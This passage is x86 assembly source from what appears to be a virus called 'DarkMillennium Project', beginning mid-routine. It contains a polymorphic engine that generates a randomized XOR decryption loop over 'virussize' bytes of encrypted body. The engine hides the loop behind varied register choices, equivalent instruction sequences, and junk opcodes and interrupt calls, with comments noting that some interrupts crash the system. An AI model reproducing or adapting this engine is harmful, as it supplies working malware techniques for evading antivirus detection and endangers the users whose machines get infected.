	;  xor	reg_3, reg_2
		mov	ax, 3366h
		stosw
		mov	al, byte ptr [ebp + reg_3 - Start]
		mov	ebx, 8
		mul	ebx
		add	al, byte ptr [ebp + reg_2 - Start]
		add	al, 0C0h
		stosb

	;  Generate Junk
		xchg	ebp, edi
		call	GenerateJunk
		xchg	ebp, edi

	;  cmp	reg3, 9090h
		mov	ax, 8166h
		stosw
		mov	al, byte ptr [ebp + reg_3 - Start]
		add	al, 0F8h
		stosb
		mov	ax, 9090h
		stosw

	;  jne -inc reg_2 line-
		mov	al, 75h
		stosb
		mov	eax, [ebp + var1 - Start]
		sub	eax, edi
		dec	eax					;  now JNE points to INC DI line
		stosb

	;  Generate Junk
		xchg	ebp, edi
		call	GenerateJunk
		xchg	ebp, edi

	;  Save the number of register that contain the key for decryption
		mov	al, [ebp + reg_2 - Start]
		mov	[ebp + reg_key - Start], al

		call	GenerateRegisters
		call	GenerateFuckRegs

	;  lea	reg_1, [ebp + key - Start]  ->  key offset will be setted later
		mov	al, 8Dh
		stosb
		mov	al, byte ptr [ebp + reg_1 - Start]
		mov	ebx, 8
		mul	ebx
		add	al, 85h
		stosb

		mov	[ebp + var3 - Start], edi		;  save EDI offset, for later use
		mov	eax, 00000000h
		stosd

	;  Generate Junk
		xchg	ebp, edi
		call	GenerateJunk
		xchg	ebp, edi

	;  add	reg_1, offset Start
		mov	al, 81h
		stosb
		mov	al, byte ptr [ebp + reg_1 - Start]
		add	al, 0C0h
		stosb
		mov	eax, offset Start
		stosd

	;  Generate Junk
		xchg	ebp, edi
		call	GenerateJunk
		xchg	ebp, edi

	;  mov	reg_2, virussize
		mov	cl, byte ptr [ebp + reg_2 - Start]
		mov	ch, 0FFh
		mov	edx, virussize
		mov	ax, 0101h
		xchg	ebp, edi
		call	GenPutX1X2
		xchg	ebp, edi

	;  Generate Junk
		xchg	ebp, edi
		call	GenerateJunk
		xchg	ebp, edi

	;  xor	[reg_1], reg_key
		mov	[ebp + var4 - Start], edi
		mov	ax, 3166h
		stosw
		xor	eax, eax
		mov	al, byte ptr [ebp + reg_key - Start]
		mov	ebx, 8
		mul	ebx
		add	al, byte ptr [ebp + reg_1 - Start]
		stosb

	;  Generate Junk
		xchg	ebp, edi
		call	GenerateJunk
		xchg	ebp, edi

	;  inc	reg_1
		mov	al, 40h
		add	al, byte ptr [ebp + reg_1 - Start]
		stosb

	;  Generate Junk
		xchg	ebp, edi
		call	GenerateJunk
		xchg	ebp, edi

	;  inc	reg_1
		mov	al, 40h
		add	al, byte ptr [ebp + reg_1 - Start]
		stosb

	;  Generate Junk
		xchg	ebp, edi
		call	GenerateJunk
		xchg	ebp, edi

	;  dec	reg_2
		mov	al, 48h
		add	al, byte ptr [ebp + reg_2 - Start]
		stosb

	;  Generate Junk
		xchg	ebp, edi
		call	GenerateJunk
		xchg	ebp, edi

	;  dec	reg_2
		mov	al, 48h
		add	al, byte ptr [ebp + reg_2 - Start]
		stosb

	;  Generate Junk
		xchg	ebp, edi
		call	GenerateJunk
		xchg	ebp, edi

	;  cmp	reg_2, 1
		mov	al, 83h
		stosb
		mov	al, 0F8h
		add	al, byte ptr [ebp + reg_2 - Start]
		stosb
		mov	al, 01
		stosb

	;  jg	-- xor [reg_1], reg_key -- line
		mov	al, 07Fh
		stosb
		mov	ax, [ebp + var4 - Start]
		sub	eax, edi
		dec	eax
		stosb

	;  Generate Junk
		xchg	ebp, edi
		call	GenerateJunk
		xchg	ebp, edi

	;  popad
		mov	al, 61h
		stosb

	;  Generate Junk
		xchg	ebp, edi
		call	GenerateJunk
		xchg	ebp, edi

		;  key word for decryption
		mov	esi, [ebp + var2 - Start]
		lea	eax, key
		mov	byte ptr [esi], al
		mov	esi, [ebp + var3 - Start]
		lea	eax, key
		mov	byte ptr [esi], al
		mov	ax, 9090h
		stosw

		nop
		nop
		nop
		nop
		nop

		;  Generate random junk to fill the space after decryptor
		lea	esi, [ebp + Encr_Code - Start]
		xchg	ebp, edi
fill_junk:	push	esi
		call	GenerateOneByteJunk
		pop	esi
		cmp	ebp, esi
		jl	fill_junk
		xchg	ebp, edi

		xchg	ebp, edi
		ret

var1		dd	0	;  keep location of INC DI line
var2		dd	0	;  keep location of LEA ESI, key instruction + 1
var3		dd	0	;  keep location of the second LEA ESI, key instruction + 1
var4		dd	0	;  keep location of XOR [ESI], DI instruction

GenDecryptor	endp		


;  Init register generator
;
InitRegGenerator	proc
		mov	byte ptr [ebp + reg_1 - Start], 0F0h
		mov	byte ptr [ebp + reg_2 - Start], 0F0h
		mov	byte ptr [ebp + reg_3 - Start], 0F0h
		mov	byte ptr [ebp + reg_key - Start], 0F0h
		mov	byte ptr [ebp + reg_fuck_1 - Start], 0F0h
		mov	byte ptr [ebp + reg_fuck_2 - Start], 0F0h
		ret
InitRegGenerator	endp

;  Generate registers for use in decryptor
;
GenerateRegisters	proc
		pushad

		;  Generate reg, not ESP, not EBP
get_reg_1:	mov	eax, 8
		call	random_in_range
		cmp	al, 4					;  no ESP
		jz	get_reg_1
		cmp	al, 5					;  no EBP
		jz	get_reg_1
		cmp	al, byte ptr [ebp + reg_key - Start]
		jz	get_reg_1
		mov	byte ptr [ebp + reg_1 - Start], al		;  save reg value for later use

		;  Generate reg2, not ESP, not EBP, <> reg1
get_reg_2:	mov	eax, 8
		call	random_in_range
		cmp	al, 4					;  no ESP
		jz	get_reg_2
		cmp	al, 5					;  no EBP
		jz	get_reg_2
		cmp	al, byte ptr [ebp + reg_1 - Start]
		jz	get_reg_2
		cmp	al, byte ptr [ebp + reg_key - Start]
		jz	get_reg_1
		mov	byte ptr [ebp + reg_2 - Start], al

		;  Generate reg3, not ESP, not EBP, <> reg1, <> reg2
get_reg_3:	mov	eax, 8
		call	random_in_range
		cmp	al, 4					;  no ESP
		jz	get_reg_3
		cmp	al, 5					;  no EBP
		jz	get_reg_3
		cmp	al, byte ptr [ebp + reg_1 - Start]
		jz	get_reg_3
		cmp	al, byte ptr [ebp + reg_2 - Start]
		jz	get_reg_3
		cmp	al, byte ptr [ebp + reg_key - Start]
		jz	get_reg_1
		mov	byte ptr [ebp + reg_3 - Start], al

		popad
		ret
GenerateRegisters	endp


;  Generate 2 registers, different from the other registers used
;
GenerateFuckRegs	proc
		pushad
get_reg_fuck_1:
		mov	eax, 8
		call	random_in_range
		cmp	al, 4					;  no ESP
		jz	get_reg_fuck_1
		cmp	al, 5					;  no EBP
		jz	get_reg_fuck_1
		cmp	al, byte ptr [ebp + reg_1 - Start]
		jz	get_reg_fuck_1
		cmp	al, byte ptr [ebp + reg_2 - Start]
		jz	get_reg_fuck_1
		cmp	al, byte ptr [ebp + reg_3 - Start]
		jz	get_reg_fuck_1
		cmp	al, byte ptr [ebp + reg_key - Start]
		jz	get_reg_fuck_1
		mov	byte ptr [ebp + reg_fuck_1 - Start], al

get_reg_fuck_2:
		mov	eax, 15
		call	random_in_range
		cmp	al, 7
		jg	ch_FFh
		cmp	al, 4					;  no ESP
		jz	get_reg_fuck_2
		cmp	al, 5					;  no EBP
		jz	get_reg_fuck_2
		cmp	al, byte ptr [ebp + reg_1 - Start]
		jz	get_reg_fuck_2
		cmp	al, byte ptr [ebp + reg_2 - Start]
		jz	get_reg_fuck_2
		cmp	al, byte ptr [ebp + reg_3 - Start]
		jz	get_reg_fuck_2
		cmp	al, byte ptr [ebp + reg_fuck_1 - Start]
		jz	get_reg_fuck_2
		cmp	al, byte ptr [ebp + reg_key - Start]
		jz	get_reg_fuck_2
		mov	byte ptr [ebp + reg_fuck_2 - Start], al
GenerateFuckRegs_Exit:
		popad
		ret

ch_FFh:	mov	al, 0FFh
		mov	byte ptr [ebp + reg_fuck_2 - Start], al
		jmp	GenerateFuckRegs_Exit

GenerateFuckRegs	endp


;  Generate MOV reg1, reg2/[reg2]/val like instructions
;  EBP = location for code
;  CL = reg1
;  CH = reg2	( if CH = 0FFh then use value from EDX instead of reg2 )
;			( in this case AH value will be ignored, no direct mem read like
;			MOV EAX, [402000h] 'cause I don't use this kind of instructions in my decryptor )
;  AL = type of registry to use	0 = word ( AX, BX ... )
;			1 = dword ( EAX, EBX ... )
;			byte registers are not used in my decryptor
;  AH =	0 use direct value ( EAX ... )
;		1 use memory address from register ( [EAX], [ESI] ... )
;  EDX =	use this value instead of reg2 in case CH = 0FFh
;
GenPutX1X2	proc
		push	eax ecx edx

		lea	eax, [edi + offset GenMovType - Start]
		mov	[edi + MovType - Start], eax
		lea	eax, [edi + offset GenPushPopType - Start]
		mov	[edi + PushPopType - Start], eax
		lea	eax, [edi + offset GenXorAddType - Start]
		mov	[edi + XorAddType - Start], eax
		lea	eax, [edi + offset GenSubAddType - Start]
		mov	[edi + SubAddType - Start], eax

		mov	eax, (offset EndPutX1X2Table - offset PutX1X2Table) / 4
		call	random_in_range
		mov	esi, 4
		mul	esi
		xchg	esi, eax
		add	esi, edi
		add	esi, offset PutX1X2Table - offset Start
		mov	ebx, dword ptr [esi]

		pop	edx ecx eax
		call	ebx
		ret

GenPutX1X2	endp


;  Decryptor Junk instructions
;  EBP = location for junk
GenerateJunk	proc
		lea	eax, [edi + offset GenerateOneByteJunk - Start]
		mov	[edi + OneByteJunk - Start], eax
		lea	eax, [edi + offset GenerateINTs - Start]
		mov	[edi + INTs - Start], eax
		lea	eax, [edi + offset GenNothing - Start]
		mov	[edi + _Nothing - Start], eax
		lea	eax, [edi + offset GenRndPutX1X2 - Start]
		mov	[edi + RndPutX1X2 - Start], eax

		mov	eax, (offset EndRandomJunkTable - offset RandomJunkTable) / 4
		call	random_in_range
		mov	esi, 4
		mul	esi		
		xchg	esi, eax
		add	esi, edi
		add	esi, offset RandomJunkTable - offset Start
		mov	eax, dword ptr [esi]
		call	eax
		ret
GenerateJunk	endp


;  Generate one byte instruction, put it in [EBP] and increase EBP with 1
;  EBP = location for generated code
GenerateOneByteJunk	proc
		lea	esi, [edi + OneByteTable - Start]			; Offset of the table
		mov	eax, offset EndOneByteTable - offset OneByteTable	; size of table
		call	random_in_range					; Must generate random numbers
		add	esi, eax						; Add AX ( AL ) to the offset
		mov	al, byte ptr [esi] 					; Put selected opcode in al
		xchg	ebp, edi
		stosb							; And store it in EDI ( points to
									; the decryptor instructions )
		xchg	ebp, edi
		ret
GenerateOneByteJunk	endp


;  Generate INT calls and increase edi with 2
;  EBP = location for generated code
GenerateINTs	proc
		lea	esi, [edi + INTsTable - Start]
		mov	eax, offset EndINTsTable - offset INTsTable
		call	random_in_range
		add	esi, eax
		mov	ah, byte ptr [esi]
		mov	al, 0CDh
		xchg	ebp, edi
		stosw
		xchg	ebp, edi
		ret
GenerateINTs	endp


;  Generate NOTHING
;  EBP = location for generated code
GenNothing	proc
		ret
GenNothing	endp


;  The same with GenPutX1X2 but with random registers and/or values
;  NOTE : the registers are not the ones that are already in use
GenRndPutX1X2	proc
		xchg	ebp, edi

		; random in EDX
		mov	eax, 0FFFFh
		call	random_in_range
		mov	dx, ax
		shl	edx, 10h
		mov	eax, 0FFFFh
		call	random_in_range
		mov	dx, ax

		;  random types
		mov	eax, 2
		call	random_in_range
		mov	bl, al
		mov	bh, 00h			;  registers like [EAX], [EBX] ... will not be generated, only EAX, EBX ...
							;  'cause it will give Access Violation in most of the cases
		mov	ax, bx

		call	GenerateFuckRegs
		mov	cl, byte ptr [ebp + reg_fuck_1 - Start]
		mov	ch, byte ptr [ebp + reg_fuck_2 - Start]

		xchg	ebp, edi
		call	GenPutX1X2
		ret
GenRndPutX1X2	endp

;  Generate MOV instructions
;  Generate MOV reg1, reg2/[reg2]/val like instructions
;  EBP = location for code
;  CL = reg1
;  CH = reg2	( if CH = 0FFh then use value from EDX instead of reg2 )
;       		( in this case AH value will be ignored, no direct mem read like
;	      	MOV EAX, [402000h] 'cause I don't use this kind of instructions in my decryptor )
;  AL = type of registry to use	0 = word ( AX, BX ... )
;               		1 = dword ( EAX, EBX ... )
;		               	byte registers are not used in my decryptor
;  AH =	0 use direct value ( EAX ... )
;       1 use memory address from register ( [EAX], [ESI] ... )
;  EDX = use this value instead of reg2 in case CH = 0FFh
;
GenMovType	proc
		xchg	ebp, edi

		cmp	ch, 0FFh
		jne	not_val
		jmp	use_val

not_val:	cmp	ch, 04h
		jnz	not_esp
		jmp	mov_esp
not_esp:	cmp	ch, 05h
		jnz	not_ebp
		jmp	mov_ebp

not_ebp:    cmp	al, 0
		jz	word_type
		cmp	al, 1
		jz	dword_type
		jmp	MovType_End

word_type:	;  reg1 = word reg
		cmp	ah, 1
		jz	word_type1

		;  MOV reg1, reg2
		mov	ax, 8B66h
		stosw
		mov	al, cl
		mov	bl, 8
		mul	bl
		add	al, ch
		add	al, 0C0h
		stosb
		jmp	MovType_End

word_type1:	;  MOV reg1, [reg2]
		mov	ax, 8B66h
		stosw
		mov	al, cl
		mov	bl, 8
		mul	bl
		add	al, ch
		stosb
		jmp	MovType_End

dword_type:	;  reg1 = dword reg
		cmp	ah, 1
		jz	dword_type1

		;  MOV reg1, reg2
		mov	al, 08Bh
		stosb
		mov	al, cl
		mov	bl, 8
		mul	bl
		add	al, ch
		add	al, 0C0h
		stosb
		jmp	MovType_End

dword_type1:	;  MOV reg1, [reg2]
		mov	al, 8Bh
		stosb
		mov	al, cl
		mov	bl, 8
		mul	bl
		add	al, ch
		stosb
		jmp	MovType_End

mov_esp:	;  MOV reg1, ESP/[ESP]
		mov	al, 8Bh
		stosb

		cmp	ah, 0
		jz	mov_esp2

		;  MOV reg1, [ESP]
		mov	al, cl
		mov	bl, 8
		mul	bl
		add	al, 04h
		stosb
		mov	al, 24h
		stosb
		jmp	MovType_End

		;  MOV reg1, ESP
mov_esp2:	mov	al, cl
		mov	bl, 8
		mul	bl
		add	al, 0C4h
		stosb
		jmp	MovType_End

mov_ebp:	;  MOV reg1, EBP/[EBP]
		mov	al, 8Bh
		stosb
		cmp	ah, 0
		jz	mov_ebp2

		;  MOV reg1, [EBP]
		mov	al, cl
		mov	bl, 8
		mul	bl
		add	al, 45h
		stosb
		mov	al, 00h
		stosb

		;  MOV reg1, EBP
mov_ebp2:	mov	al, cl
		mov	bl, 8
		mul	bl
		add	al, 0C5h
		stosb
		jmp	MovType_End

MovType_End:	xchg	ebp, edi
		ret

use_val:	cmp	al, 0
		jne	use_val_

		mov	al, 66h
		stosb
		mov	al, 0B8h
		add	al, cl
		stosb
		mov	ax, dx
		stosw
		jmp	MovType_End

use_val_:		mov	al, 0B8h
		add	al, cl
		stosb
		mov	eax, edx
		stosd
		jmp	MovType_End

GenMovType	endp


;  Generate PUSH reg2/[reg2]/val ... POP reg1  ( = MOV reg1, reg2/[reg2]/val )
;  EBP = location for code
;  CL = reg1	(PUSH reg1)
;  CH = reg2	(POP reg2)
;		( if CH = 0FFh then use value from EDX instead of reg2 )
;		( in this case AH value will be ignored, no direct mem read like
;		MOV EAX, [402000h] 'cause I don't use this kind of instructions in my decryptor )
;  AL = type of registry to use	0 = word ( AX, BX ... )
;				1 = dword ( EAX, EBX ... )
;				byte registers are not used in my decryptor
;  AH =	0 use direct value ( EAX ... )
;	1 use memory address from register ( [EAX], [ESI] ... )
;  EDX =	use this value instead of reg2 in case CH = 0FFh
;
GenPushPopType	proc

		xchg	ebp, edi

		cmp	ch, 0FFh
		jnz	not_val_2
		push	ax
		jmp	use_val_2

not_val_2:	push	ax
		cmp	al, 0
		jnz	not_wordreg

		mov	al, 66h
		stosb

not_wordreg:	cmp	ah, 0
		jz	not_ebp_

		cmp	ch, 04h
		jnz	not_esp_
		jmp	push_esp
not_esp_:	cmp	ch, 05h
		jnz	not_ebp_
		jmp	push_ebp

not_ebp_:	cmp	ah, 1
		jz	push_type1

		;  PUSH reg2
		mov	al, 50h
		add	al, ch
		stosb
		jmp	Pop_reg1

push_type1:	;  PUSH [reg2]
		mov	al, 0FFh
		stosb
		mov	al, 30h
		add	al, ch
		stosb

		;  POP reg1
		pop	ax
		cmp	al, 0
		jnz	not_wordreg__

		mov	al, 66h
		stosb

not_wordreg__:	mov	al, 58h
		add	al, cl
		stosb
		jmp	PushPopType_End

push_esp:	;  PUSH [ESP] (reg2)
		mov	ax, 34FFh
		stosw
		mov	al, 24h
		stosb
		jmp	Pop_reg1

push_ebp:	;  PUSH [EBP] (reg2)
		mov	ax, 75FFh
		stosw
		mov	al, 00h
		stosb

Pop_reg1:	;  POP reg1
		pop	ax
		cmp	al, 0
		jnz	not_wordreg_

		mov	al, 66h
		stosb

not_wordreg_:	mov	al, 58h
		add	al, cl
		stosb

PushPopType_End:xchg	ebp, edi
		ret

use_val_2:	cmp	al, 0
		jnz	not_wordreg___

		;  PUSH	val
		mov	ax, 6866h
		stosw
		mov	ax, dx
		stosw
		mov	ch, cl
		jmp	Pop_reg1

not_wordreg___:	mov	al, 68h
		stosb
		mov	eax, edx
		stosd
		pop	ax
		mov	al, 1
		mov	ch, cl
		push	ax
		jmp	Pop_reg1

GenPushPopType	endp


;  Generate XOR reg1, reg1 ... ADD reg1, reg2/[reg2]/val  ( = MOV reg1, reg2/[reg2]/val )
;  EBP = location for code
;  CL = reg1
;  CH = reg2	( if CH = 0FFh then use value from EDX instead of reg2 )
;		( in this case AH value will be ignored, no direct mem read like
;		MOV EAX, [402000h] 'cause I don't use this kind of instructions in my decryptor )
;  AL = type of registry to use	0 = word ( AX, BX ... )
;			1 = dword ( EAX, EBX ... )
;			byte registers are not used in my decryptor
;  AH =	0 use direct value ( EAX ... )
;	1 use memory address from register ( [EAX], [ESI] ... )
;  EDX =	use this value instead of reg2 in case CH = 0FFh
;
GenXorAddType	proc
		xchg	ebp, edi

		cmp	ch, 0FFh
		jnz	not_val_3
		jmp	use_val_3

not_val_3:	push	ax
		cmp	al, 0
		jnz	not_wordreg_2
		jmp	wordreg_2

not_wordreg_2:	;  XOR reg1, reg1
		mov	al, 33h
		stosb
		mov	al, cl
		mov	bl, 9
		mul	bl
		add	al, 0C0h
		stosb

		pop	ax
		cmp	ah, 0
		jz	dwordreg_2

		cmp	ch, 4			; ESP ?
		jz	add_esp
		cmp	ch, 5			; EBP ?
		jz	add_ebp

		;  ADD reg1, [reg2]
		mov	al, 03h
		stosb
		mov	al, cl
		mov	bl, 8
		mul	bl
		add	al, ch
		stosb
		jmp	GenXorAddType_End		

		;  ADD reg1, [ESP]
add_esp:	mov	al, 03h
		stosb
		mov	al, cl
		mov	bl, 9
		mul	bl
		add	al, 04h
		stosb
		mov	al, 24h
		stosb
		jmp	GenSubAddType_End

		;  ADD reg1, [EBP]
add_ebp:	mov	al, 03h
		stosb
		mov	al, cl
		mov	bl, 8
		mul	bl
		add	al, 45h
		stosb
		jmp	GenSubAddType_End

dwordreg_2:	;  ADD	reg1, reg2
		mov	al, 03h
		stosb
		mov	al, cl
		mov	bl, 8
		mul	bl
		add	al, 0C0h
		add	al, ch
		stosb
		jmp	GenXorAddType_End

wordreg_2:	;  XOR reg1, reg1
		mov	ax, 3366h
		stosw
		mov	al, cl
		mov	bl, 9
		mul	bl
		add	al, 0C0h
		stosb

		pop	ax
		cmp	ah, 0
		jz	wordreg_2_

		;  ADD reg1, [reg2]
		mov	ax, 0366h
		stosw
		mov	al, cl
		mov	bl, 8
		mul	bl
		add	al, ch
		stosb
		jmp	GenXorAddType_End

wordreg_2_:	;  ADD reg1, reg2
		mov	ax, 0366h
		stosw
		mov	al, cl
		mov	bl, 8
		mul	bl
		add	al, 0C0h
		add	al, ch
		stosb
		jmp	GenXorAddType_End

use_val_3:	;  XOR reg1, reg1
		mov	al, 33h
		stosb
		mov	al, cl
		mov	bl, 9
		mul	bl
		add	al, 0C0h
		stosb

		;  ADD reg1, val
		mov	al, 81h
		stosb
		mov	al, 0C0h
		add	al, cl
		stosb
		mov	eax, edx
		stosd

GenXorAddType_End:
		xchg	ebp, edi
		ret

GenXorAddType	endp


;  Generate SUB reg1, reg1 ... ADD reg1, reg2/[reg2]/val
;  EBP = location for code
;  CL = reg1
;  CH = reg2	( if CH = 0FFh then use value from EDX instead of reg2 )
;		( in this case AH value will be ignored, no direct mem read like
;		MOV EAX, [402000h] 'cause I don't use this kind of instructions in my decryptor )
;  AL = type of registry to use	0 = word ( AX, BX ... )
;				1 = dword ( EAX, EBX ... )
;				byte registers are not used in my decryptor
;  AH =	0 use direct value ( EAX ... )
;	1 use memory address from register ( [EAX], [ESI] ... )
;  EDX =	use this value instead of reg2 in case CH = 0FFh
;
GenSubAddType	proc
		xchg	ebp, edi

		cmp	ch, 0FFh
		jnz	not_val_4
		jmp	use_val_4

not_val_4:	push	ax
		cmp	al, 0
		jnz	not_wordreg_3
		jmp	wordreg_3

not_wordreg_3:	;  SUB reg1, reg1
		mov	al, 2Bh
		stosb
		mov	al, cl
		mov	bl, 9
		mul	bl
		add	al, 0C0h
		stosb

		pop	ax
		cmp	ah, 0
		jz	dwordreg_3

		cmp	ch, 4			; ESP ?
		jz	add_esp_
		cmp	ch, 5			; EBP ?
		jz	add_ebp_

		;  ADD reg1, [reg2]
		mov	al, 03h
		stosb
		mov	al, cl
		mov	bl, 8
		mul	bl
		add	al, ch
		stosb
		jmp	GenSubAddType_End

		;  ADD reg1, [ESP]
add_esp_:	mov	al, 03h
		stosb
		mov	al, cl
		mov	bl, 9
		mul	bl
		add	al, 04h
		stosb
		mov	al, 24h
		stosb
		jmp	GenSubAddType_End

		;  ADD reg1, [EBP]
add_ebp_:	mov	al, 03h
		stosb
		mov	al, cl
		mov	bl, 8
		mul	bl
		add	al, 45h
		stosb
		jmp	GenSubAddType_End

dwordreg_3:	;  ADD	reg1, reg2
		mov	al, 03h
		stosb
		mov	al, cl
		mov	bl, 8
		mul	bl
		add	al, 0C0h
		add	al, ch
		stosb
		jmp	GenSubAddType_End

wordreg_3:	;  SUB reg1, reg1
		mov	ax, 2B66h
		stosw
		mov	al, cl
		mov	bl, 9
		mul	bl
		add	al, 0C0h
		stosb

		pop	ax
		cmp	ah, 0
		jz	wordreg_3_

		;  ADD reg1, [reg2]
		mov	ax, 0366h
		stosw
		mov	al, cl
		mov	bl, 8
		mul	bl
		add	al, ch
		stosb
		jmp	GenSubAddType_End

wordreg_3_:	;  ADD reg1, reg2
		mov	ax, 0366h
		stosw
		mov	al, cl
		mov	bl, 8
		mul	bl
		add	al, 0C0h
		add	al, ch
		stosb
		jmp	GenSubAddType_End

use_val_4:	;  SUB reg1, reg1
		mov	al, 2Bh
		stosb
		mov	al, cl
		mov	bl, 9
		mul	bl
		add	al, 0C0h
		stosb

		;  ADD reg1, val
		mov	al, 81h
		stosb
		mov	al, 0C0h
		add	al, cl
		stosb
		mov	eax, edx
		stosd

GenSubAddType_End:
		xchg	ebp, edi
		ret
GenSubAddType	endp

;  Return a random number in AX, between 0 and AX-1
random_in_range	proc
		push	bx dx
		xchg	ax, bx
		call	get_rnd
		xor	dx, dx
		div	bx
		xchg	ax, dx
		pop	dx bx
		ret
random_in_range	endp


;  Tables

RandomJunkTable:	
	OneByteJunk		dd	offset GenerateOneByteJunk
	INTs			dd	offset GenerateINTs
	_Nothing		dd	offset GenNothing
	RndPutX1X2		dd	offset GenRndPutX1X2
EndRandomJunkTable:

OneByteTable:	db	090h			; nop
		db	0F8h			; clc
		db	0F9h			; stc
		db	0F5h			; cmc
;		db	0CCh			; int 3h
;		db	098h			; cbw
;		db	099h			; cwd
EndOneByteTable:

INTsTable:	;db	01h
		db	08h
		db	0Ah
		db	0Bh
		db	0Ch
;		db	0Dh
		db	0Eh
		db	0Fh
;		db	1Ch
		db	28h
		db	2Bh
		db	2Ch
		db	2Dh
		db	70h
		db	71h
		db	72h
		db	73h
		db	74h
;		db	75h
		db	76h
		db	77h
; those with ; before'em will generate an error (ussualy a blue screen)

EndINTsTable:

PutX1X2Table:
	MovType		dd	offset GenMovType
	PushPopType	      dd	offset GenPushPopType
	XorAddType	      dd	offset GenXorAddType
	SubAddType	      dd	offset GenSubAddType
EndPutX1X2Table:

regsTable:
	reg_1		db	0
	reg_2		db	0
	reg_3		db	0
	reg_key	db	0
	reg_fuck_1	db	0
	reg_fuck_2	db	0
regsTableEnd:

_end:

gfx_buffer		db	10Dh dup (0)
_end_2:

w_title		db	'DarkMillennium Project', 0

		end	Begin
		end